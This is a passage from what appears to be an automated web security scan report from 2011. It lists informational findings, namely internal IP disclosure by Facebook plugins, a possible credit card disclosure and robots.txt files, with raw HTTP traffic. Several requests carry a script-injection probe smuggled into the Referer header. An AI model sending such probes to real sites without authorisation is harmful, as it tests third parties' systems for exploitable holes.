Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.91.120
X-Cnection: close
Date: Mon, 09 May 2011 14:08:51 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
20.40. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=158577044196953&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2b28cbe2%26origin%3Dhttp%253A%252F%252Fwww.nme.com%252Ff272cfc8b4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.nme.com%2Fnews%2Fsufjan-stevens%2F56527&layout=button_count&locale=en_GB&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.91.130
X-Cnection: close
Date: Mon, 09 May 2011 14:04:45 GMT
Content-Length: 9581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
20.41. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.93.128
X-Cnection: close
Date: Mon, 09 May 2011 14:08:50 GMT
Content-Length: 8563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
20.42. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.75.113
X-Cnection: close
Date: Mon, 09 May 2011 14:08:54 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
20.43. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.thevine.com.au%2Fmusic%2Fblogs%2Fmusic-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&layout=button_count&show_faces=true&width=75&action=like&colorscheme=light&height=30 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.87.104
X-Cnection: close
Date: Mon, 09 May 2011 14:06:59 GMT
Content-Length: 7157

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
20.44. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.106.122
X-Cnection: close
Date: Mon, 09 May 2011 14:08:53 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
20.45. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.90.123
X-Cnection: close
Date: Mon, 09 May 2011 14:08:54 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
20.46. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.115.117
X-Cnection: close
Date: Mon, 09 May 2011 14:08:53 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
20.47. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Firishtimestheticket&width=300&colorscheme=light&connections=10&stream=false&header=false&height=270 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.80.104
X-Cnection: close
Date: Mon, 09 May 2011 14:04:05 GMT
Content-Length: 12967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
20.48. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?api_key=158577044196953&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df251994bac%26origin%3Dhttp%253A%252F%252Fwww.nme.com%252Ff272cfc8b4%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=258&href=http%3A%2F%2Fwww.facebook.com%2Fnmemagazine&locale=en_GB&sdk=joey&show_faces=true&stream=false&width=356 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.106.125
X-Cnection: close
Date: Mon, 09 May 2011 14:04:49 GMT
Content-Length: 18197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
21. Credit card numbers disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orlandosentinel.com
Path:   /business/os-cfb-cover-casey-tv-20110509,0,6839926.story

Issue detail

The following credit card numbers were disclosed in the response:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

Request

GET /business/os-cfb-cover-casey-tv-20110509,0,6839926.story HTTP/1.1
Host: www.orlandosentinel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.orlandosentinel.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html; charset=UTF-8
X-Instance-Name: i7s30z1n1
Last-Modified: Mon, 09 May 2011 13:58:29 GMT
Vary: Accept-Encoding
Cache-Control: private, max-age=142
Date: Mon, 09 May 2011 13:59:15 GMT
Connection: close
Content-Length: 227706


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//E
...[SNIP]...
<img src="http://www.zap2it.com/media/thumbnails/photogallery/2010-12/57991005-01215646.jpg" alt="Midseason report card: Zap2it grades the progress on fall 2010's new shows" width="80" height="44" />
...[SNIP]...
<img src="http://www.zap2it.com/media/thumbnails/photogallery/2010-12/58250815-20155633.jpg" alt="TV's Underrated stars of 2010: Zap2it's Year in Review" width="80" height="44" />
...[SNIP]...
<img src="http://www.zap2it.com/media/thumbnails/photogallery/2010-12/58114906-29092207.jpg" alt="TV's Guilty Pleasures of 2010: Zap2it's Year in Review" width="80" height="44" />
...[SNIP]...
<img src="http://www.zap2it.com/media/thumbnails/photogallery/2010-12/58070983-20155250.jpg" alt="Top 10 Epic TV Bromances of 2010" width="80" height="44" />
...[SNIP]...
<img src="http://media.trb.com/media/thumbnails/htmlpage/2010-04/52786402-05054957.jpg" alt="Casey Anthony in court: See comments from Monday's live chat" width="80" height="44" />
...[SNIP]...
<img height="34" alt="Orlando Sentinel Text Alerts" width="32" src="http://media.trb.com/media/thumbnails/graphic/2011-03/59698616-29153332.png" border="0" />
...[SNIP]...
22. Robots.txt file  previous  next
There are 21 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

22.1. http://ad-apac.doubleclick.net/adj/onl.vine/music/blogs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad-apac.doubleclick.net
Path:   /adj/onl.vine/music/blogs

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad-apac.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Mon, 09 May 2011 14:01:16 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /
22.2. http://ad.au.doubleclick.net/ad/N799.WhistleOut/B5381461.80  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /ad/N799.WhistleOut/B5381461.80

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.au.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Mon, 09 May 2011 14:02:49 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /
22.3. http://adserver.adtech.de/addyn%7C3.0%7C656%7C1497495%7C0%7C170%7CADTECH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C656%7C1497495%7C0%7C170%7CADTECH

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adserver.adtech.de

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 26

User-agent: *
Disallow: /
22.4. http://adserverams.adtech.de/adperf%7C2.0%7C577%7C2951881%7C0%7C1%7CAdId=5763683  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserverams.adtech.de
Path:   /adperf%7C2.0%7C577%7C2951881%7C0%7C1%7CAdId=5763683

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adserverams.adtech.de

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 26

User-agent: *
Disallow: /
22.5. http://alvenda.122.2o7.net/b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://alvenda.122.2o7.net
Path:   /b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: alvenda.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:53 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "245ff1-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www17
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
22.6. http://cspix.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cspix.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"36-1268078506000"
Last-Modified: Mon, 08 Mar 2010 20:01:46 GMT
Content-Type: text/plain
Content-Length: 36
Date: Mon, 09 May 2011 14:05:47 GMT
Connection: close

# go away
User-agent: *
Disallow: /
22.7. http://edge.viagogo.co.uk/feeds/widget.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://edge.viagogo.co.uk
Path:   /feeds/widget.ashx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: edge.viagogo.co.uk

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: public
Content-Type: text/plain; charset=utf-8
Date: Mon, 09 May 2011 14:01:16 GMT
Last-Modified: Thu, 05 May 2011 14:46:46 GMT
Server: ECS (dca/5339)
Vary: Accept-Encoding
X-AspNet-Version: 4.0.30319
X-Cache: HIT
X-Powered-By: ASP.NET
Content-Length: 3053
Connection: close

# Viagogo Robots.txt Last Updated: 25/10/2010

User-agent: *
Disallow: /secure/
Disallow: /Secure/
Disallow: /fi/secure/
Disallow: /fi/Secure/
Disallow: /no/secure/
Disallow: /no/Secure/
Dis
...[SNIP]...
22.8. http://f2nthevine.112.2o7.net/b/ss/f2nthevine/1/H.11-pdv-2/s88536230181343  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://f2nthevine.112.2o7.net
Path:   /b/ss/f2nthevine/1/H.11-pdv-2/s88536230181343

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: f2nthevine.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:59 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "305159-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www46
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
22.9. http://ie-stat.bmmetrix.com/V13a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ie-stat.bmmetrix.com
Path:   /V13a

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ie-stat.bmmetrix.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:03:51 GMT
Server: Apache/2
Last-Modified: Fri, 06 Feb 2009 03:21:20 GMT
ETag: "1deab-30-4623783c08c00"
Accept-Ranges: bytes
Content-Length: 48
Connection: close
Content-Type: text/plain

# Exclude all robots
User-agent: *
Disallow: /

22.10. http://imp.fetchback.com/serve/fb/adtag.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: imp.fetchback.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:32 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 255
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

##
## Created: June 10th 2007. (nikolas@codesquare.com)
## Updated: November 16th 2007. (nikolas@codesquare.com)
##
##
User-agent: *

Disallow: /reports
Disallow: /dev
Disallow: /tmp
Disallow: /hub
Di
...[SNIP]...
22.11. http://ipcmedia.122.2o7.net/b/ss/nmeprod,ipcauditglobalprod/1/H.22.1/s89725573572795  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ipcmedia.122.2o7.net
Path:   /b/ss/nmeprod,ipcauditglobalprod/1/H.22.1/s89725573572795

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ipcmedia.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:02 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "31dddd-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www15
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
22.12. http://irishtimesgroup.112.2o7.net/b/ss/itgirishtimesprod/1/H.15.1/s81982920831069  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://irishtimesgroup.112.2o7.net
Path:   /b/ss/itgirishtimesprod/1/H.15.1/s81982920831069

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: irishtimesgroup.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:04:12 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "1b5154-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www72
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
22.13. http://l.addthiscdn.com/live/t00/250lo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.addthiscdn.com
Path:   /live/t00/250lo.gif

Issue detail

